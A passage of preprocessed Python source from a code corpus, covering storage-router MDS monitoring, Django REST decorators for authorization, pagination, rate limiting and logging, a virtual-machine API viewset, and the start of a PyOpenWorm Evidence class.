get_mds_load ( mds_service ) <EOL> if load < max_load : <EOL> has_room = True <EOL> break <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name , has_room ) ) <EOL> if has_room is False and client is not None : <EOL> mds_service = MDSServiceController . prepare_mds_service ( storagerouter = storagerouter , <EOL> vpool = vpool , <EOL> fresh_only = False , <EOL> reload_config = True ) <EOL> if mds_service is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mds_services . append ( mds_service ) <EOL> mds_config_set = MDSServiceController . get_mds_storagedriver_config_set ( vpool , True ) <EOL> for storagerouter in storagerouter_info : <EOL> client = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> if client is None : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> continue <EOL> storagedriver = [ sd for sd in storagerouter . storagedrivers if sd . vpool_guid == vpool . guid ] [ <NUM_LIT:0> ] <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> if storagedriver_config . is_new is False : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name , mds_config_set [ storagerouter . guid ] ) ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_filesystem ( fs_metadata_backend_mds_nodes = mds_config_set [ storagerouter . guid ] ) <EOL> storagedriver_config . save ( client ) <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name ) ) <EOL> for vdisk in vpool . vdisks : <EOL> try : <EOL> MDSServiceController . ensure_safety ( vdisk ) <EOL> except Exception as ex : <EOL> failures . append ( '<STR_LIT>' . format ( vdisk . name , vdisk . guid , ex ) ) <EOL> if len ( failures ) > <NUM_LIT:0> : <EOL> raise Exception ( '<STR_LIT>' + '<STR_LIT>' . join ( failures ) ) <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from ovs . dal . lists . storagerouterlist import StorageRouterList <EOL> try : <EOL> while True : <EOL> output = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( time . time ( ) ) , <EOL> '<STR_LIT>' ] <EOL> for _sr in StorageRouterList . get_storagerouters ( ) : <EOL> output . append ( '<STR_LIT>' . format ( _sr . name , _sr . ip ) ) <EOL> vpools = set ( sd . vpool for sd in _sr . storagedrivers ) <EOL> for _vpool in vpools : <EOL> output . append ( '<STR_LIT>' . format ( _vpool . name ) ) <EOL> for _mds_service in _vpool . mds_services : <EOL> if _mds_service . service . storagerouter_guid == _sr . guid : <EOL> masters , slaves = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for _junction in _mds_service . vdisks : <EOL> if _junction . is_master : <EOL> masters += <NUM_LIT:1> <EOL> else : <EOL> slaves += <NUM_LIT:1> <EOL> capacity = _mds_service . capacity <EOL> if capacity == - <NUM_LIT:1> : <EOL> capacity = '<STR_LIT>' <EOL> _load , _ = MDSServiceController . get_mds_load ( _mds_service ) <EOL> if _load == float ( '<STR_LIT>' ) : <EOL> _load = '<STR_LIT>' <EOL> else : <EOL> _load = '<STR_LIT>' . format ( round ( _load , <NUM_LIT:2> ) ) <EOL> output . append ( '<STR_LIT>' . format ( <EOL> _mds_service . number , _mds_service . service . ports [ <NUM_LIT:0> ] , masters , slaves , capacity , _load <EOL> ) ) <EOL> output += [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> print '<STR_LIT>' + '<STR_LIT:\n>' . join ( output ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> import re <EOL> import json <EOL> import inspect <EOL> import time <EOL> from ovs . dal . lists . userlist import UserList <EOL> from ovs . dal . lists . storagerouterlist import StorageRouterList <EOL> from ovs . dal . helpers import Toolbox as DalToolbox <EOL> from rest_framework . response import Response <EOL> from toolbox import Toolbox <EOL> from rest_framework . exceptions import PermissionDenied , NotAuthenticated , NotAcceptable , Throttled <EOL> from rest_framework import status <EOL> from rest_framework . request import Request <EOL> from django . core . handlers . wsgi import WSGIRequest <EOL> from django . http import Http404 <EOL> from django . conf import settings <EOL> from ovs . dal . exceptions import ObjectNotFoundException <EOL> from backend . serializers . serializers import FullSerializer <EOL> from ovs . log . logHandler import LogHandler <EOL> from ovs . extensions . storage . volatilefactory import VolatileFactory <EOL> from ovs . extensions . generic . volatilemutex import VolatileMutex <EOL> logger = LogHandler . get ( '<STR_LIT>' ) <EOL> regex = re . compile ( '<STR_LIT>' ) <EOL> def _find_request ( args ) : <EOL> """<STR_LIT>""" <EOL> for item in args : <EOL> if isinstance ( item , Request ) or isinstance ( item , WSGIRequest ) : <EOL> return item <EOL> def required_roles ( roles ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> if not hasattr ( request , '<STR_LIT:user>' ) or not hasattr ( request , '<STR_LIT>' ) : <EOL> raise NotAuthenticated ( ) <EOL> user = UserList . get_user_by_username ( request . user . username ) <EOL> if user is None : <EOL> raise NotAuthenticated ( ) <EOL> if not Toolbox . is_token_in_roles ( request . token , roles ) : <EOL> raise PermissionDenied ( '<STR_LIT>' % ( '<STR_LIT:U+002CU+0020>' . 
join ( roles ) ) ) <EOL> return f ( * args , ** kw ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def load ( object_type = None , min_version = settings . VERSION [ <NUM_LIT:0> ] , max_version = settings . VERSION [ - <NUM_LIT:1> ] ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def _try_parse ( value ) : <EOL> """<STR_LIT>""" <EOL> if value == '<STR_LIT:true>' or value == '<STR_LIT:True>' : <EOL> return True <EOL> if value == '<STR_LIT:false>' or value == '<STR_LIT:False>' : <EOL> return False <EOL> return value <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> new_kwargs = { } <EOL> function_info = inspect . getargspec ( f ) <EOL> if function_info . defaults is None : <EOL> mandatory_vars = function_info . args [ <NUM_LIT:1> : ] <EOL> optional_vars = [ ] <EOL> else : <EOL> mandatory_vars = function_info . args [ <NUM_LIT:1> : - len ( function_info . defaults ) ] <EOL> optional_vars = function_info . args [ len ( mandatory_vars ) + <NUM_LIT:1> : ] <EOL> version = regex . match ( request . META [ '<STR_LIT>' ] ) . groupdict ( ) [ '<STR_LIT:version>' ] <EOL> versions = ( max ( min_version , settings . VERSION [ <NUM_LIT:0> ] ) , min ( max_version , settings . VERSION [ - <NUM_LIT:1> ] ) ) <EOL> if version == '<STR_LIT:*>' : <EOL> version = versions [ <NUM_LIT:1> ] <EOL> version = int ( version ) <EOL> if version < versions [ <NUM_LIT:0> ] or version > versions [ <NUM_LIT:1> ] : <EOL> raise NotAcceptable ( '<STR_LIT>' . format ( versions [ <NUM_LIT:0> ] , versions [ <NUM_LIT:1> ] , version ) ) <EOL> if '<STR_LIT:version>' in mandatory_vars : <EOL> new_kwargs [ '<STR_LIT:version>' ] = version <EOL> mandatory_vars . remove ( '<STR_LIT:version>' ) <EOL> if '<STR_LIT>' in mandatory_vars : <EOL> new_kwargs [ '<STR_LIT>' ] = request <EOL> mandatory_vars . 
remove ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and object_type is not None : <EOL> typename = object_type . __name__ . lower ( ) <EOL> try : <EOL> instance = object_type ( kwargs [ '<STR_LIT>' ] ) <EOL> if typename in mandatory_vars : <EOL> new_kwargs [ typename ] = instance <EOL> mandatory_vars . remove ( typename ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( ) <EOL> if '<STR_LIT>' in mandatory_vars : <EOL> storagerouter = StorageRouterList . get_by_machine_id ( settings . UNIQUE_ID ) <EOL> new_kwargs [ '<STR_LIT>' ] = storagerouter <EOL> mandatory_vars . remove ( '<STR_LIT>' ) <EOL> post_data = request . DATA if hasattr ( request , '<STR_LIT>' ) else request . POST <EOL> get_data = request . QUERY_PARAMS if hasattr ( request , '<STR_LIT>' ) else request . GET <EOL> for name in mandatory_vars : <EOL> if name in kwargs : <EOL> new_kwargs [ name ] = kwargs [ name ] <EOL> else : <EOL> if name not in post_data : <EOL> if name not in get_data : <EOL> raise NotAcceptable ( '<STR_LIT>' . format ( name ) ) <EOL> new_kwargs [ name ] = _try_parse ( get_data [ name ] ) <EOL> else : <EOL> new_kwargs [ name ] = _try_parse ( post_data [ name ] ) <EOL> for name in optional_vars : <EOL> if name in kwargs : <EOL> new_kwargs [ name ] = kwargs [ name ] <EOL> else : <EOL> if name in post_data : <EOL> new_kwargs [ name ] = _try_parse ( post_data [ name ] ) <EOL> elif name in get_data : <EOL> new_kwargs [ name ] = _try_parse ( get_data [ name ] ) <EOL> return f ( args [ <NUM_LIT:0> ] , ** new_kwargs ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_list ( object_type , default_sort = None ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> sort = request . QUERY_PARAMS . 
get ( '<STR_LIT>' ) <EOL> if sort is None and default_sort is not None : <EOL> sort = default_sort <EOL> sort = None if sort is None else [ s for s in reversed ( sort . split ( '<STR_LIT:U+002C>' ) ) ] <EOL> page = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> page = int ( page ) if page is not None and page . isdigit ( ) else None <EOL> page_size = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> page_size = int ( page_size ) if page_size is not None and page_size . isdigit ( ) else None <EOL> page_size = page_size if page_size in [ <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT:100> ] else <NUM_LIT:10> <EOL> contents = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> contents = None if contents is None else contents . split ( '<STR_LIT:U+002C>' ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = { } <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = sort is not None or contents is not None <EOL> data_list = f ( * args , ** kwargs ) <EOL> guid_list = isinstance ( data_list , list ) and len ( data_list ) > <NUM_LIT:0> and isinstance ( data_list [ <NUM_LIT:0> ] , basestring ) <EOL> if sort is not None : <EOL> if guid_list is True : <EOL> data_list = [ object_type ( guid ) for guid in data_list ] <EOL> guid_list = False <EOL> for sort_item in sort : <EOL> desc = sort_item [ <NUM_LIT:0> ] == '<STR_LIT:->' <EOL> field = sort_item [ <NUM_LIT:1> if desc else <NUM_LIT:0> : ] <EOL> data_list . sort ( key = lambda e : DalToolbox . extract_key ( e , field ) , reverse = desc ) <EOL> total_items = len ( data_list ) <EOL> page_metadata = { '<STR_LIT>' : total_items , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : page_size , <EOL> '<STR_LIT>' : min ( <NUM_LIT:1> , total_items ) , <EOL> '<STR_LIT>' : total_items } <EOL> if page is not None : <EOL> max_page = int ( math . 
ceil ( total_items / ( page_size * <NUM_LIT:1.0> ) ) ) <EOL> if page > max_page : <EOL> page = max_page <EOL> if page == <NUM_LIT:0> : <EOL> start_number = - <NUM_LIT:1> <EOL> end_number = <NUM_LIT:0> <EOL> else : <EOL> start_number = ( page - <NUM_LIT:1> ) * page_size <EOL> end_number = start_number + page_size <EOL> data_list = data_list [ start_number : end_number ] <EOL> page_metadata = dict ( page_metadata . items ( ) + { '<STR_LIT>' : max ( <NUM_LIT:1> , page ) , <EOL> '<STR_LIT>' : max ( <NUM_LIT:1> , max_page ) , <EOL> '<STR_LIT>' : start_number + <NUM_LIT:1> , <EOL> '<STR_LIT>' : min ( total_items , end_number ) } . items ( ) ) <EOL> if contents is not None : <EOL> if guid_list is True : <EOL> data_list = [ object_type ( guid ) for guid in data_list ] <EOL> data = FullSerializer ( object_type , contents = contents , instance = data_list , many = True ) . data <EOL> else : <EOL> if guid_list is False : <EOL> data_list = [ item . guid for item in data_list ] <EOL> data = data_list <EOL> result = { '<STR_LIT:data>' : data , <EOL> '<STR_LIT>' : page_metadata , <EOL> '<STR_LIT>' : contents , <EOL> '<STR_LIT>' : [ s for s in reversed ( sort ) ] if sort else sort } <EOL> return Response ( result , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_object ( object_type ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> contents = request . QUERY_PARAMS . get ( '<STR_LIT>' ) <EOL> contents = None if contents is None else contents . split ( '<STR_LIT:U+002C>' ) <EOL> obj = f ( * args , ** kwargs ) <EOL> return Response ( FullSerializer ( object_type , contents = contents , instance = obj ) . data , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . 
__module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_task ( ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> task = f ( * args , ** kwargs ) <EOL> return Response ( task . id , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def return_plain ( ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = f ( * args , ** kwargs ) <EOL> return Response ( result , status = status . HTTP_200_OK ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def limit ( amount , per , timeout ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> now = time . time ( ) <EOL> key = '<STR_LIT>' . format ( <EOL> f . __module__ , f . __name__ , <EOL> request . META [ '<STR_LIT>' ] <EOL> ) <EOL> client = VolatileFactory . get_client ( ) <EOL> with VolatileMutex ( key ) : <EOL> rate_info = client . get ( key , { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : None } ) <EOL> active_timeout = rate_info [ '<STR_LIT>' ] <EOL> if active_timeout is not None : <EOL> if active_timeout > now : <EOL> logger . warning ( '<STR_LIT>' . format ( key , active_timeout - now ) ) <EOL> raise Throttled ( wait = active_timeout - now ) <EOL> else : <EOL> rate_info [ '<STR_LIT>' ] = None <EOL> rate_info [ '<STR_LIT>' ] = [ call for call in rate_info [ '<STR_LIT>' ] if call > ( now - per ) ] + [ now ] <EOL> calls = len ( rate_info [ '<STR_LIT>' ] ) <EOL> if calls > amount : <EOL> rate_info [ '<STR_LIT>' ] = now + timeout <EOL> client . 
set ( key , rate_info ) <EOL> logger . warning ( '<STR_LIT>' . format ( key , timeout ) ) <EOL> raise Throttled ( wait = timeout ) <EOL> client . set ( key , rate_info ) <EOL> return f ( * args , ** kwargs ) <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap <EOL> def log ( log_slow = True ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> """<STR_LIT>""" <EOL> def new_function ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = _find_request ( args ) <EOL> method_args = list ( args ) [ : ] <EOL> method_args = method_args [ method_args . index ( request ) + <NUM_LIT:1> : ] <EOL> metadata = { '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . META . iteritems ( ) ) , <EOL> '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . REQUEST . iteritems ( ) ) , <EOL> '<STR_LIT>' : dict ( ( str ( key ) , str ( value ) ) for key , value in request . COOKIES . iteritems ( ) ) } <EOL> _logger = LogHandler . get ( '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> _logger . info ( '<STR_LIT>' . format ( <EOL> f . __module__ , <EOL> f . __name__ , <EOL> getattr ( request , '<STR_LIT>' ) . user_guid if hasattr ( request , '<STR_LIT>' ) else None , <EOL> json . dumps ( method_args ) , <EOL> json . dumps ( kwargs ) , <EOL> json . dumps ( metadata ) <EOL> ) ) <EOL> start = time . time ( ) <EOL> return_value = f ( * args , ** kwargs ) <EOL> duration = time . time ( ) - start <EOL> if duration > <NUM_LIT:5> and log_slow is True : <EOL> logger . warning ( '<STR_LIT>' . format ( f . __module__ , f . __name__ , round ( duration , <NUM_LIT:2> ) ) ) <EOL> return return_value <EOL> new_function . __name__ = f . __name__ <EOL> new_function . __module__ = f . __module__ <EOL> return new_function <EOL> return wrap </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from rest_framework import viewsets <EOL> from rest_framework . permissions import IsAuthenticated <EOL> from rest_framework . decorators import action , link <EOL> from rest_framework . exceptions import NotAcceptable <EOL> from django . http import Http404 <EOL> from ovs . dal . lists . vmachinelist import VMachineList <EOL> from ovs . dal . hybrids . vmachine import VMachine <EOL> from ovs . dal . hybrids . pmachine import PMachine <EOL> from ovs . dal . hybrids . vpool import VPool <EOL> from ovs . dal . datalist import DataList <EOL> from ovs . lib . vmachine import VMachineController <EOL> from ovs . dal . exceptions import ObjectNotFoundException <EOL> from backend . decorators import required_roles , load , return_list , return_object , return_task , log <EOL> class VMachineViewSet ( viewsets . ViewSet ) : <EOL> """<STR_LIT>""" <EOL> permission_classes = ( IsAuthenticated , ) <EOL> prefix = r'<STR_LIT>' <EOL> base_name = '<STR_LIT>' <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( VMachine , '<STR_LIT>' ) <EOL> @ load ( ) <EOL> def list ( self , vpoolguid = None , query = None ) : <EOL> """<STR_LIT>""" <EOL> if vpoolguid is not None : <EOL> vpool = VPool ( vpoolguid ) <EOL> vmachine_guids = [ ] <EOL> vmachines = [ ] <EOL> for vdisk in vpool . vdisks : <EOL> if vdisk . vmachine_guid is not None and vdisk . vmachine_guid not in vmachine_guids : <EOL> vmachine_guids . append ( vdisk . vmachine . guid ) <EOL> if vdisk . vmachine . is_vtemplate is False : <EOL> vmachines . append ( vdisk . vmachine ) <EOL> elif query is not None : <EOL> query = json . loads ( query ) <EOL> vmachines = DataList ( VMachine , query ) <EOL> else : <EOL> vmachines = VMachineList . 
get_vmachines ( ) <EOL> return vmachines <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_object ( VMachine ) <EOL> @ load ( VMachine ) <EOL> def retrieve ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> return vmachine <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def delete_vtemplate ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> if not vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . delete . delay ( machineguid = vmachine . guid ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def rollback ( self , vmachine , timestamp ) : <EOL> """<STR_LIT>""" <EOL> if vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . rollback . delay ( machineguid = vmachine . guid , <EOL> timestamp = timestamp ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def snapshot ( self , vmachine , name , consistent , sticky ) : <EOL> """<STR_LIT>""" <EOL> if vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> label = str ( name ) <EOL> is_consistent = True if consistent else False <EOL> is_sticky = True if sticky else False <EOL> return VMachineController . snapshot . delay ( machineguid = vmachine . guid , <EOL> label = label , <EOL> is_consistent = is_consistent , <EOL> is_automatic = False , <EOL> is_sticky = is_sticky ) <EOL> @ link ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( VMachine ) <EOL> @ load ( VMachine ) <EOL> def get_children ( self , vmachine , hints ) : <EOL> """<STR_LIT>""" <EOL> children_vmachine_guids = [ ] <EOL> children_vmachines = [ ] <EOL> if vmachine . 
is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> for vdisk in vmachine . vdisks : <EOL> for cdisk in vdisk . child_vdisks : <EOL> if cdisk . vmachine_guid not in children_vmachine_guids : <EOL> children_vmachine_guids . append ( cdisk . vmachine_guid ) <EOL> if hints [ '<STR_LIT>' ] is True : <EOL> children_vmachines . append ( cdisk . vmachine ) <EOL> return children_vmachines if hints [ '<STR_LIT>' ] is True else children_vmachine_guids <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def set_as_template ( self , vmachine ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . set_as_template . delay ( machineguid = vmachine . guid ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def create_from_template ( self , vmachine , pmachineguid , name , description ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> pmachine = PMachine ( pmachineguid ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> if vmachine . is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> return VMachineController . create_from_template . delay ( machineguid = vmachine . guid , <EOL> pmachineguid = pmachine . guid , <EOL> name = str ( name ) , <EOL> description = str ( description ) ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def create_multiple_from_template ( self , vmachine , pmachineguids , amount , start , name , description ) : <EOL> """<STR_LIT>""" <EOL> if len ( pmachineguids ) == <NUM_LIT:0> : <EOL> raise NotAcceptable <EOL> try : <EOL> for pmachienguid in pmachineguids : <EOL> _ = PMachine ( pmachienguid ) <EOL> except ObjectNotFoundException : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> if vmachine . 
is_vtemplate is False : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> if not isinstance ( amount , int ) or not isinstance ( start , int ) : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> amount = max ( <NUM_LIT:1> , amount ) <EOL> start = max ( <NUM_LIT:0> , start ) <EOL> return VMachineController . create_multiple_from_template . delay ( machineguid = vmachine . guid , <EOL> pmachineguids = pmachineguids , <EOL> amount = amount , <EOL> start = start , <EOL> name = str ( name ) , <EOL> description = str ( description ) ) <EOL> @ link ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' ] ) <EOL> @ return_list ( PMachine ) <EOL> @ load ( VMachine ) <EOL> def get_target_pmachines ( self , vmachine , hints ) : <EOL> """<STR_LIT>""" <EOL> if not vmachine . is_vtemplate : <EOL> raise NotAcceptable ( '<STR_LIT>' ) <EOL> vpool_guids = [ ] <EOL> vpools = [ ] <EOL> if vmachine . vpool is not None : <EOL> if vmachine . vpool_guid not in vpool_guids : <EOL> vpools . append ( vmachine . vpool ) <EOL> vpool_guids . append ( vmachine . vpool_guid ) <EOL> for vdisk in vmachine . vdisks : <EOL> if vdisk . vpool_guid not in vpool_guids : <EOL> vpools . append ( vdisk . vpool ) <EOL> vpool_guids . append ( vdisk . vpool_guid ) <EOL> pmachine_guids = None <EOL> pmachines = { } <EOL> for vpool in vpools : <EOL> this_pmachine_guids = set ( ) <EOL> for storagedriver in vpool . storagedrivers : <EOL> this_pmachine_guids . add ( storagedriver . storagerouter . pmachine_guid ) <EOL> if hints [ '<STR_LIT>' ] is True : <EOL> pmachines [ storagedriver . storagerouter . pmachine_guid ] = storagedriver . storagerouter . 
pmachine <EOL> if pmachine_guids is None : <EOL> pmachine_guids = list ( this_pmachine_guids ) <EOL> else : <EOL> pmachine_guids = list ( this_pmachine_guids & set ( pmachine_guids ) ) <EOL> return pmachine_guids if hints [ '<STR_LIT>' ] is False else [ pmachines [ guid ] for guid in pmachine_guids ] <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def clone_from_snapshot ( self , vmachine , snapshot_timestamp , new_machine_name ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . clone . delay ( machineguid = vmachine . guid , <EOL> timestamp = snapshot_timestamp , <EOL> name = new_machine_name ) <EOL> @ action ( ) <EOL> @ log ( ) <EOL> @ required_roles ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> @ return_task ( ) <EOL> @ load ( VMachine ) <EOL> def delete_snapshot ( self , vmachine , snapshot_timestamp ) : <EOL> """<STR_LIT>""" <EOL> return VMachineController . delete_snapshot . delay ( vmachineguid = vmachine . guid , <EOL> timestamp = snapshot_timestamp ) </s>
<s> from PyOpenWorm . pProperty import Property <EOL> from PyOpenWorm . dataObject import DataObject <EOL> class EvidenceError ( Exception ) : <EOL> pass <EOL> def _pubmed_uri_to_pmid ( uri ) : <EOL> from urlparse import urlparse <EOL> parsed = urlparse ( uri ) <EOL> pmid = int ( parsed . path . split ( "<STR_LIT:/>" ) [ <NUM_LIT:2> ] ) <EOL> return pmid <EOL> def _doi_uri_to_doi ( uri ) : <EOL> from urlparse import urlparse <EOL> from urllib2 import unquote <EOL> parsed = urlparse ( uri ) <EOL> doi = parsed . path . split ( "<STR_LIT:/>" ) [ <NUM_LIT:1> ] <EOL> doi = unquote ( doi ) <EOL> return doi <EOL> def _url_request ( url , headers = { } ) : <EOL> import urllib2 as U <EOL> try : <EOL> r = U . Request ( url , headers = headers ) <EOL> s = U . urlopen ( r , timeout = <NUM_LIT:1> ) <EOL> return s <EOL> except U . HTTPError : <EOL> return "<STR_LIT>" <EOL> except U . URLError : <EOL> return "<STR_LIT>" <EOL> def _json_request ( url ) : <EOL> import json <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } <EOL> try : <EOL> return json . load ( _url_request ( url , headers ) ) <EOL> except BaseException : <EOL> return { } <EOL> class AssertsAllAbout ( Property ) : <EOL> multiple = True <EOL> linkName = "<STR_LIT>" <EOL> def __init__ ( self , ** kwargs ) : <EOL> Property . __init__ ( self , '<STR_LIT>' , ** kwargs ) <EOL> @ property <EOL> def values ( self ) : <EOL> return [ ] <EOL> def set ( self , o , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . owner . asserts ( o ) <EOL> for p in o . properties : <EOL> self . owner . asserts ( p ) <EOL> def get ( self , ** kwargs ) : <EOL> ns = { "<STR_LIT>" : self . base_namespace , <EOL> "<STR_LIT>" : self . rdf_namespace , <EOL> "<STR_LIT>" : self . base_namespace [ "<STR_LIT>" ] + "<STR_LIT:/>" , <EOL> "<STR_LIT>" : self . 
base_namespace [ "<STR_LIT>" ] + "<STR_LIT:/>" <EOL> } <EOL> q = """<STR_LIT>""" <EOL> def triples ( self , ** kwargs ) : <EOL> return [ ] <EOL> class Evidence ( DataObject ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , <EOL> conf = False , <EOL> author = None , <EOL> uri = None , <EOL> year = None , <EOL> date = None , <EOL> title = None , <EOL> doi = None , <EOL> wbid = None , <EOL> wormbaseid = None , <EOL> wormbase = None , <EOL> bibtex = None , <EOL> pmid = None , <EOL> pubmed = None , <EOL> ** kwargs ) : <EOL> super ( Evidence , self ) . __init__ ( conf = conf , ** kwargs ) <EOL> self . _fields = dict ( ) <EOL> Evidence . ObjectProperty ( '<STR_LIT>' , multiple = True , owner = self ) <EOL> AssertsAllAbout ( owner = self ) <EOL> multivalued_fields = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> other_fields = ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . id_precedence = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for x in multivalued_fields : <EOL> Evidence . DatatypeProperty ( x , multiple = True , owner = self ) <EOL> for x in other_fields : <EOL> Evidence . DatatypeProperty ( x , owner = self ) <EOL> if pmid is not None : <EOL> self . _fields [ '<STR_LIT>' ] = pmid <EOL> elif pubmed is not None : <EOL> self . _fields [ '<STR_LIT>' ] = pubmed <EOL> if '<STR_LIT>' in 